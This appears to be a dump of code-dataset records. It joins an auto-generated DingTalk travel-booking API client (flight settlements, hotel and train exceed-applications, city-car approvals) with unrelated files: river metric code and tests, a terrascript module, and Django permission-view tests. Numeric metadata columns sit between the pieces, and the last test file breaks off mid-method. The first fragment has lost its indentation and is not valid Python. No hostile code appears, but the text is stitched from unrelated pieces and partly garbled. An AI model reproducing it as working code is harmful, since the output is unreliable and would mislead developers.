body['thirdPartInvoiceId'] = request.third_part_invoice_id
if not UtilClient.is_unset(request.times_total):
body['timesTotal'] = request.times_total
if not UtilClient.is_unset(request.times_type):
body['timesType'] = request.times_type
if not UtilClient.is_unset(request.times_used):
body['timesUsed'] = request.times_used
if not UtilClient.is_unset(request.title):
body['title'] = request.title
if not UtilClient.is_unset(request.user_id):
body['userId'] = request.user_id
if not UtilClient.is_unset(request.ding_suite_key):
body['dingSuiteKey'] = request.ding_suite_key
if not UtilClient.is_unset(request.ding_corp_id):
body['dingCorpId'] = request.ding_corp_id
if not UtilClient.is_unset(request.ding_token_grant_type):
body['dingTokenGrantType'] = request.ding_token_grant_type
if not UtilClient.is_unset(request.finished_date):
body['finishedDate'] = request.finished_date
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
body=OpenApiUtilClient.parse_to_map(body)
)
return TeaCore.from_map(
dingtalkalitrip__1__0_models.AddCityCarApplyResponse(),
await self.do_roarequest_async('AddCityCarApply', 'alitrip_1.0', 'HTTP', 'POST', 'AK', f'/v1.0/alitrip/cityCarApprovals', 'json', req, runtime)
)
def bill_settement_flight(
self,
request: dingtalkalitrip__1__0_models.BillSettementFlightRequest,
) -> dingtalkalitrip__1__0_models.BillSettementFlightResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkalitrip__1__0_models.BillSettementFlightHeaders()
return self.bill_settement_flight_with_options(request, headers, runtime)
async def bill_settement_flight_async(
self,
request: dingtalkalitrip__1__0_models.BillSettementFlightRequest,
) -> dingtalkalitrip__1__0_models.BillSettementFlightResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkalitrip__1__0_models.BillSettementFlightHeaders()
return await self.bill_settement_flight_with_options_async(request, headers, runtime)
def bill_settement_flight_with_options(
self,
request: dingtalkalitrip__1__0_models.BillSettementFlightRequest,
headers: dingtalkalitrip__1__0_models.BillSettementFlightHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkalitrip__1__0_models.BillSettementFlightResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.corp_id):
query['corpId'] = request.corp_id
if not UtilClient.is_unset(request.category):
query['category'] = request.category
if not UtilClient.is_unset(request.page_size):
query['pageSize'] = request.page_size
if not UtilClient.is_unset(request.period_start):
query['periodStart'] = request.period_start
if not UtilClient.is_unset(request.page_number):
query['pageNumber'] = request.page_number
if not UtilClient.is_unset(request.period_end):
query['periodEnd'] = request.period_end
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
query=OpenApiUtilClient.query(query)
)
return TeaCore.from_map(
dingtalkalitrip__1__0_models.BillSettementFlightResponse(),
self.do_roarequest('BillSettementFlight', 'alitrip_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/alitrip/billSettlements/flights', 'json', req, runtime)
)
async def bill_settement_flight_with_options_async(
self,
request: dingtalkalitrip__1__0_models.BillSettementFlightRequest,
headers: dingtalkalitrip__1__0_models.BillSettementFlightHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkalitrip__1__0_models.BillSettementFlightResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.corp_id):
query['corpId'] = request.corp_id
if not UtilClient.is_unset(request.category):
query['category'] = request.category
if not UtilClient.is_unset(request.page_size):
query['pageSize'] = request.page_size
if not UtilClient.is_unset(request.period_start):
query['periodStart'] = request.period_start
if not UtilClient.is_unset(request.page_number):
query['pageNumber'] = request.page_number
if not UtilClient.is_unset(request.period_end):
query['periodEnd'] = request.period_end
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
query=OpenApiUtilClient.query(query)
)
return TeaCore.from_map(
dingtalkalitrip__1__0_models.BillSettementFlightResponse(),
await self.do_roarequest_async('BillSettementFlight', 'alitrip_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/alitrip/billSettlements/flights', 'json', req, runtime)
)
def get_hotel_exceed_apply(
self,
request: dingtalkalitrip__1__0_models.GetHotelExceedApplyRequest,
) -> dingtalkalitrip__1__0_models.GetHotelExceedApplyResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkalitrip__1__0_models.GetHotelExceedApplyHeaders()
return self.get_hotel_exceed_apply_with_options(request, headers, runtime)
async def get_hotel_exceed_apply_async(
self,
request: dingtalkalitrip__1__0_models.GetHotelExceedApplyRequest,
) -> dingtalkalitrip__1__0_models.GetHotelExceedApplyResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkalitrip__1__0_models.GetHotelExceedApplyHeaders()
return await self.get_hotel_exceed_apply_with_options_async(request, headers, runtime)
def get_hotel_exceed_apply_with_options(
self,
request: dingtalkalitrip__1__0_models.GetHotelExceedApplyRequest,
headers: dingtalkalitrip__1__0_models.GetHotelExceedApplyHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkalitrip__1__0_models.GetHotelExceedApplyResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.corp_id):
query['corpId'] = request.corp_id
if not UtilClient.is_unset(request.apply_id):
query['applyId'] = request.apply_id
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
query=OpenApiUtilClient.query(query)
)
return TeaCore.from_map(
dingtalkalitrip__1__0_models.GetHotelExceedApplyResponse(),
self.do_roarequest('GetHotelExceedApply', 'alitrip_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/alitrip/exceedapply/getHotel', 'json', req, runtime)
)
async def get_hotel_exceed_apply_with_options_async(
self,
request: dingtalkalitrip__1__0_models.GetHotelExceedApplyRequest,
headers: dingtalkalitrip__1__0_models.GetHotelExceedApplyHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkalitrip__1__0_models.GetHotelExceedApplyResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.corp_id):
query['corpId'] = request.corp_id
if not UtilClient.is_unset(request.apply_id):
query['applyId'] = request.apply_id
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
query=OpenApiUtilClient.query(query)
)
return TeaCore.from_map(
dingtalkalitrip__1__0_models.GetHotelExceedApplyResponse(),
await self.do_roarequest_async('GetHotelExceedApply', 'alitrip_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/alitrip/exceedapply/getHotel', 'json', req, runtime)
)
def query_union_order(
self,
request: dingtalkalitrip__1__0_models.QueryUnionOrderRequest,
) -> dingtalkalitrip__1__0_models.QueryUnionOrderResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkalitrip__1__0_models.QueryUnionOrderHeaders()
return self.query_union_order_with_options(request, headers, runtime)
async def query_union_order_async(
self,
request: dingtalkalitrip__1__0_models.QueryUnionOrderRequest,
) -> dingtalkalitrip__1__0_models.QueryUnionOrderResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkalitrip__1__0_models.QueryUnionOrderHeaders()
return await self.query_union_order_with_options_async(request, headers, runtime)
def query_union_order_with_options(
self,
request: dingtalkalitrip__1__0_models.QueryUnionOrderRequest,
headers: dingtalkalitrip__1__0_models.QueryUnionOrderHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkalitrip__1__0_models.QueryUnionOrderResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.corp_id):
query['corpId'] = request.corp_id
if not UtilClient.is_unset(request.third_part_apply_id):
query['thirdPartApplyId'] = request.third_part_apply_id
if not UtilClient.is_unset(request.union_no):
query['unionNo'] = request.union_no
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
query=OpenApiUtilClient.query(query)
)
return TeaCore.from_map(
dingtalkalitrip__1__0_models.QueryUnionOrderResponse(),
self.do_roarequest('QueryUnionOrder', 'alitrip_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/alitrip/unionOrders', 'json', req, runtime)
)
async def query_union_order_with_options_async(
self,
request: dingtalkalitrip__1__0_models.QueryUnionOrderRequest,
headers: dingtalkalitrip__1__0_models.QueryUnionOrderHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkalitrip__1__0_models.QueryUnionOrderResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.corp_id):
query['corpId'] = request.corp_id
if not UtilClient.is_unset(request.third_part_apply_id):
query['thirdPartApplyId'] = request.third_part_apply_id
if not UtilClient.is_unset(request.union_no):
query['unionNo'] = request.union_no
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
query=OpenApiUtilClient.query(query)
)
return TeaCore.from_map(
dingtalkalitrip__1__0_models.QueryUnionOrderResponse(),
await self.do_roarequest_async('QueryUnionOrder', 'alitrip_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/alitrip/unionOrders', 'json', req, runtime)
)
def query_city_car_apply(
self,
request: dingtalkalitrip__1__0_models.QueryCityCarApplyRequest,
) -> dingtalkalitrip__1__0_models.QueryCityCarApplyResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkalitrip__1__0_models.QueryCityCarApplyHeaders()
return self.query_city_car_apply_with_options(request, headers, runtime)
async def query_city_car_apply_async(
self,
request: dingtalkalitrip__1__0_models.QueryCityCarApplyRequest,
) -> dingtalkalitrip__1__0_models.QueryCityCarApplyResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkalitrip__1__0_models.QueryCityCarApplyHeaders()
return await self.query_city_car_apply_with_options_async(request, headers, runtime)
def query_city_car_apply_with_options(
self,
request: dingtalkalitrip__1__0_models.QueryCityCarApplyRequest,
headers: dingtalkalitrip__1__0_models.QueryCityCarApplyHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkalitrip__1__0_models.QueryCityCarApplyResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.corp_id):
query['corpId'] = request.corp_id
if not UtilClient.is_unset(request.created_end_at):
query['createdEndAt'] = request.created_end_at
if not UtilClient.is_unset(request.created_start_at):
query['createdStartAt'] = request.created_start_at
if not UtilClient.is_unset(request.page_number):
query['pageNumber'] = request.page_number
if not UtilClient.is_unset(request.page_size):
query['pageSize'] = request.page_size
if not UtilClient.is_unset(request.third_part_apply_id):
query['thirdPartApplyId'] = request.third_part_apply_id
if not UtilClient.is_unset(request.user_id):
query['userId'] = request.user_id
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
query=OpenApiUtilClient.query(query)
)
return TeaCore.from_map(
dingtalkalitrip__1__0_models.QueryCityCarApplyResponse(),
self.do_roarequest('QueryCityCarApply', 'alitrip_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/alitrip/cityCarApprovals', 'json', req, runtime)
)
async def query_city_car_apply_with_options_async(
self,
request: dingtalkalitrip__1__0_models.QueryCityCarApplyRequest,
headers: dingtalkalitrip__1__0_models.QueryCityCarApplyHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkalitrip__1__0_models.QueryCityCarApplyResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.corp_id):
query['corpId'] = request.corp_id
if not UtilClient.is_unset(request.created_end_at):
query['createdEndAt'] = request.created_end_at
if not UtilClient.is_unset(request.created_start_at):
query['createdStartAt'] = request.created_start_at
if not UtilClient.is_unset(request.page_number):
query['pageNumber'] = request.page_number
if not UtilClient.is_unset(request.page_size):
query['pageSize'] = request.page_size
if not UtilClient.is_unset(request.third_part_apply_id):
query['thirdPartApplyId'] = request.third_part_apply_id
if not UtilClient.is_unset(request.user_id):
query['userId'] = request.user_id
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
query=OpenApiUtilClient.query(query)
)
return TeaCore.from_map(
dingtalkalitrip__1__0_models.QueryCityCarApplyResponse(),
await self.do_roarequest_async('QueryCityCarApply', 'alitrip_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/alitrip/cityCarApprovals', 'json', req, runtime)
)
def get_train_exceed_apply(
self,
request: dingtalkalitrip__1__0_models.GetTrainExceedApplyRequest,
) -> dingtalkalitrip__1__0_models.GetTrainExceedApplyResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkalitrip__1__0_models.GetTrainExceedApplyHeaders()
return self.get_train_exceed_apply_with_options(request, headers, runtime)
async def get_train_exceed_apply_async(
self,
request: dingtalkalitrip__1__0_models.GetTrainExceedApplyRequest,
) -> dingtalkalitrip__1__0_models.GetTrainExceedApplyResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkalitrip__1__0_models.GetTrainExceedApplyHeaders()
return await self.get_train_exceed_apply_with_options_async(request, headers, runtime)
def get_train_exceed_apply_with_options(
self,
request: dingtalkalitrip__1__0_models.GetTrainExceedApplyRequest,
headers: dingtalkalitrip__1__0_models.GetTrainExceedApplyHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkalitrip__1__0_models.GetTrainExceedApplyResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.corp_id):
query['corpId'] = request.corp_id
if not UtilClient.is_unset(request.apply_id):
query['applyId'] = request.apply_id
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
query=OpenApiUtilClient.query(query)
)
return TeaCore.from_map(
dingtalkalitrip__1__0_models.GetTrainExceedApplyResponse(),
self.do_roarequest('GetTrainExceedApply', 'alitrip_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/alitrip/exceedapply/getTrain', 'json', req, runtime)
)
async def get_train_exceed_apply_with_options_async(
self,
request: dingtalkalitrip__1__0_models.GetTrainExceedApplyRequest,
headers: dingtalkalitrip__1__0_models.GetTrainExceedApplyHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkalitrip__1__0_models.GetTrainExceedApplyResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.corp_id):
query['corpId'] = request.corp_id
if not UtilClient.is_unset(request.apply_id):
query['applyId'] = request.apply_id
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
query=OpenApiUtilClient.query(query)
)
return TeaCore.from_map(
dingtalkalitrip__1__0_models.GetTrainExceedApplyResponse(),
await self.do_roarequest_async('GetTrainExceedApply', 'alitrip_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/alitrip/exceedapply/getTrain', 'json', req, runtime)
)
| 50.653218
| 173
| 0.700284
| 5,762
| 52,730
| 6.013363
| 0.037834
| 0.028284
| 0.084851
| 0.096164
| 0.979942
| 0.966002
| 0.95515
| 0.94326
| 0.936795
| 0.916419
| 0
| 0.010546
| 0.214185
| 52,730
| 1,040
| 174
| 50.701923
| 0.825659
| 0.001517
| 0
| 0.838415
| 1
| 0
| 0.07265
| 0.02903
| 0
| 0
| 0
| 0
| 0
| 1
| 0.025407
| false
| 0
| 0.007114
| 0
| 0.082317
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
aac5c05c8c25eb97073702ef09377f3747851dc2
| 176
|
py
|
Python
|
django_server/fvh_courier/rest/tests/__init__.py
|
ForumViriumHelsinki/CityLogistics
|
df4efef49bdc740a1dc47d0bda49ce2b3833e9c1
|
[
"MIT"
] | 1
|
2021-11-02T03:21:48.000Z
|
2021-11-02T03:21:48.000Z
|
django_server/fvh_courier/rest/tests/__init__.py
|
ForumViriumHelsinki/CityLogistics
|
df4efef49bdc740a1dc47d0bda49ce2b3833e9c1
|
[
"MIT"
] | 136
|
2019-12-03T14:52:17.000Z
|
2022-02-26T21:18:15.000Z
|
django_server/fvh_courier/rest/tests/__init__.py
|
ForumViriumHelsinki/CityLogistics
|
df4efef49bdc740a1dc47d0bda49ce2b3833e9c1
|
[
"MIT"
] | 2
|
2020-06-23T23:58:08.000Z
|
2020-12-08T13:19:28.000Z
|
from .available_packages_tests import * # noqa
from .outgoing_packages_tests import * # noqa
from .reserved_packages_tests import * # noqa
from .rest_tests import * # noqa
| 35.2
| 47
| 0.772727
| 23
| 176
| 5.608696
| 0.391304
| 0.341085
| 0.465116
| 0.534884
| 0.627907
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.159091
| 176
| 4
| 48
| 44
| 0.871622
| 0.107955
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
2af380581058306eaf70e3dd92e239d2c7dfc581
| 382
|
py
|
Python
|
terrascript/data/circonus.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 507
|
2017-07-26T02:58:38.000Z
|
2022-01-21T12:35:13.000Z
|
terrascript/data/circonus.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 135
|
2017-07-20T12:01:59.000Z
|
2021-10-04T22:25:40.000Z
|
terrascript/data/circonus.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 81
|
2018-02-20T17:55:28.000Z
|
2022-01-31T07:08:40.000Z
|
# terrascript/data/circonus.py
# Automatically generated by tools/makecode.py (24-Sep-2021 15:13:59 UTC)
#
# For imports without namespace, e.g.
#
# >>> import terrascript.data.circonus
#
# instead of
#
# >>> import terrascript.data.circonus-labs.circonus
#
# This is only available for 'official' and 'partner' providers.
from terrascript.data.circonus_labs.circonus import *
| 25.466667
| 73
| 0.743455
| 51
| 382
| 5.54902
| 0.686275
| 0.212014
| 0.325088
| 0.204947
| 0.24735
| 0
| 0
| 0
| 0
| 0
| 0
| 0.036254
| 0.133508
| 382
| 14
| 74
| 27.285714
| 0.818731
| 0.790576
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
2d59dc46987b2971918f29c09b427d77d2e1be71
| 2,584
|
py
|
Python
|
river/metrics/hamming.py
|
mathco-wf/river
|
c6ff38fa4ce4843ede1cba77248e0370a67a36f6
|
[
"BSD-3-Clause"
] | 2,184
|
2020-11-11T12:31:12.000Z
|
2022-03-31T16:45:41.000Z
|
river/metrics/hamming.py
|
raphaelsty/river
|
2e0b25a2ef2d2ba9ec080cf86a491f7465433b18
|
[
"BSD-3-Clause"
] | 262
|
2020-11-11T17:15:47.000Z
|
2022-03-31T23:54:03.000Z
|
river/metrics/hamming.py
|
raphaelsty/river
|
2e0b25a2ef2d2ba9ec080cf86a491f7465433b18
|
[
"BSD-3-Clause"
] | 240
|
2020-11-11T14:25:03.000Z
|
2022-03-31T08:25:50.000Z
|
import numpy as np
from . import base
__all__ = ["Hamming"]
class Hamming(base.MultiOutputClassificationMetric):
    """Hamming score.

    The Hamming score is the fraction of labels that are correctly predicted.

    Parameters
    ----------
    cm
        This parameter allows sharing the same confusion matrix between multiple metrics. Sharing a
        confusion matrix reduces the amount of storage and computation time.

    Examples
    --------
    >>> from river import metrics
    >>> y_true = [
    ...     {0: False, 1: True, 2: True},
    ...     {0: True, 1: True, 2: False},
    ...     {0: True, 1: True, 2: False},
    ... ]
    >>> y_pred = [
    ...     {0: True, 1: True, 2: True},
    ...     {0: True, 1: False, 2: False},
    ...     {0: True, 1: True, 2: False},
    ... ]
    >>> metric = metrics.Hamming()
    >>> for yt, yp in zip(y_true, y_pred):
    ...     metric = metric.update(yt, yp)
    >>> metric
    Hamming: 0.555556
    """

    @property
    def bigger_is_better(self):
        # A larger fraction of correctly predicted labels is better.
        return True

    @property
    def requires_labels(self):
        return True

    def get(self):
        # cm.data[:, 1, 1] holds the true-positive cell of each per-label
        # confusion matrix; summing it counts correctly predicted labels.
        correct = np.sum(self.cm.data[:, 1, 1])
        try:
            return correct / (self.cm.n_samples * self.cm.n_labels)
        except ZeroDivisionError:
            # No samples seen yet — report 0 rather than crashing.
            return 0.0
class HammingLoss(base.MultiOutputClassificationMetric):
    """Hamming loss score.

    The Hamming loss is the complement of the Hamming score.

    Parameters
    ----------
    cm
        This parameter allows sharing the same confusion matrix between multiple metrics. Sharing a
        confusion matrix reduces the amount of storage and computation time.

    Examples
    --------
    >>> from river import metrics
    >>> y_true = [
    ...     {0: False, 1: True, 2: True},
    ...     {0: True, 1: True, 2: False},
    ...     {0: True, 1: True, 2: False},
    ... ]
    >>> y_pred = [
    ...     {0: True, 1: True, 2: True},
    ...     {0: True, 1: False, 2: False},
    ...     {0: True, 1: True, 2: False},
    ... ]
    >>> metric = metrics.HammingLoss()
    >>> for yt, yp in zip(y_true, y_pred):
    ...     metric = metric.update(yt, yp)
    >>> metric
    HammingLoss: 0.444444
    """

    @property
    def bigger_is_better(self):
        # BUG FIX: this is a *loss* (fraction of mispredicted labels), so a
        # smaller value is better. The previous implementation returned True,
        # which would make any tooling that ranks models by this metric
        # prefer the worse model.
        return False

    @property
    def requires_labels(self):
        return True

    def get(self):
        try:
            # 1 - Hamming score: complement of the fraction of correctly
            # predicted labels (cm.data[:, 1, 1] are the per-label true
            # positives).
            return 1.0 - np.sum(self.cm.data[:, 1, 1]) / (
                self.cm.n_samples * self.cm.n_labels
            )
        except ZeroDivisionError:
            # No samples seen yet — report 0 rather than crashing.
            return 0.0
| 22.275862
| 99
| 0.535604
| 308
| 2,584
| 4.422078
| 0.243506
| 0.036711
| 0.044053
| 0.058737
| 0.762115
| 0.762115
| 0.762115
| 0.762115
| 0.762115
| 0.762115
| 0
| 0.034286
| 0.322755
| 2,584
| 115
| 100
| 22.469565
| 0.744
| 0.576238
| 0
| 0.709677
| 0
| 0
| 0.007955
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.193548
| false
| 0
| 0.064516
| 0.129032
| 0.580645
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 8
|
2d7bcbf53bd132114eaf2d5be9e2efbe5a2a41de
| 25,348
|
py
|
Python
|
django/bosscore/test/test_permission_views.py
|
ArnaudGallardo/boss
|
c0d3bbca31575ac5442822b8d7f962def32d9072
|
[
"Apache-2.0"
] | 20
|
2016-05-16T21:08:13.000Z
|
2021-11-16T11:50:19.000Z
|
django/bosscore/test/test_permission_views.py
|
ArnaudGallardo/boss
|
c0d3bbca31575ac5442822b8d7f962def32d9072
|
[
"Apache-2.0"
] | 31
|
2016-10-28T17:51:11.000Z
|
2022-02-10T08:07:31.000Z
|
django/bosscore/test/test_permission_views.py
|
ArnaudGallardo/boss
|
c0d3bbca31575ac5442822b8d7f962def32d9072
|
[
"Apache-2.0"
] | 12
|
2016-10-28T17:47:01.000Z
|
2021-05-18T23:47:06.000Z
|
# Copyright 2016 The Johns Hopkins University Applied Physics Laboratory
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from rest_framework.test import APITestCase
from django.conf import settings
from .setup_db import SetupTestDB
from ..constants import PUBLIC_GRP
import json
version = settings.BOSS_VERSION
class PermissionViewsCollectionTests(APITestCase):
    """
    Class to test the permission service which assigns permissions to collections
    """
    def setUp(self):
        """
        Initialize the database with a logged-in 'testuser' (resource-manager
        role), a 'test' group, and the standard test resources.
        :return:
        """
        dbsetup = SetupTestDB()
        user = dbsetup.create_user('testuser')
        dbsetup.add_role('resource-manager')
        dbsetup.set_user(user)
        self.client.force_login(user)
        dbsetup.create_group('test')
        dbsetup.insert_test_data()
    def test_get_permission(self):
        """
        Get the full list of permission sets
        """
        url = '/' + version + '/permissions/'
        response = self.client.get(url)
        self.assertEqual(response.status_code, 200)
    def test_get_permission_empty(self):
        """
        Get permissions filtered by a group that has no assignments yet;
        the permission-set list should be empty
        """
        url = '/' + version + '/permissions/?group=test'
        response = self.client.get(url)
        self.assertEqual(response.status_code, 200)
        self.assertEqual(response.data['permission-sets'], [])
    def test_post_permission_collection(self):
        """
        Post permissions for a valid group and collection
        """
        url = '/' + version + '/permissions/'
        data = {
            'group': 'test',
            'collection': 'col1',
            'permissions': ['read', 'add', 'update']
        }
        response = self.client.post(url, data=data)
        self.assertEqual(response.status_code, 201)
    def test_post_invalid_permissions_collection(self):
        """
        Post invalid permissions strings
        """
        url = '/' + version + '/permissions/'
        data = {
            'group': 'test',
            'collection': 'col1',
            # 'readeeee' is not a valid permission string
            'permissions': ['readeeee', 'add', 'update']
        }
        response = self.client.post(url, data=data)
        self.assertEqual(response.status_code, 400)
    def test_post_permissions_invalid(self):
        """
        Post permissions to a resource or group that does not exist
        """
        # Resource does not exist
        url = '/' + version + '/permissions/'
        data = {
            'group': 'test',
            'collection': 'col1eee',
            'permissions': ['read', 'add', 'update']
        }
        response = self.client.post(url, data=data)
        self.assertEqual(response.status_code, 404)
        # group does not exist
        url = '/' + version + '/permissions/'
        data = {
            'group': 'testeee',
            'collection': 'col1',
            'permissions': ['read', 'add', 'update']
        }
        response = self.client.post(url, data=data)
        self.assertEqual(response.status_code, 404)
    def test_get_permission_for_collection_filter_group(self):
        """
        Get permissions for a collection, filtered by group
        """
        url = '/' + version + '/permissions/'
        data = {
            'group': 'test',
            'collection': 'col1',
            'permissions': ['read', 'add', 'update']
        }
        response = self.client.post(url, data=data)
        self.assertEqual(response.status_code, 201)
        url = '/' + version + '/permissions/?group=test'
        response = self.client.get(url)
        self.assertEqual(response.status_code, 200)
    def test_get_permission_for_collection_filter_collection(self):
        """
        Get permissions for a collection, filtered by collection
        """
        url = '/' + version + '/permissions/'
        data = {
            'group': 'test',
            'collection': 'col1',
            'permissions': ['read', 'add', 'update']
        }
        response = self.client.post(url, data=data)
        self.assertEqual(response.status_code, 201)
        url = '/' + version + '/permissions/?collection=col1'
        response = self.client.get(url)
        self.assertEqual(response.status_code, 200)
    def test_get_permission_for_collection_filter_collection_group(self):
        """
        Get permissions for a collection, filtered by both group and collection
        """
        url = '/' + version + '/permissions/'
        data = {
            'group': 'test',
            'collection': 'col1',
            'permissions': ['read', 'add', 'update']
        }
        response = self.client.post(url, data=data)
        self.assertEqual(response.status_code, 201)
        url = '/' + version + '/permissions/?group=test&collection=col1'
        response = self.client.get(url)
        self.assertEqual(response.status_code, 200)
    def test_get_permission_invalid(self):
        """
        Get permissions for a resource that does not exist or a group that does not exist
        """
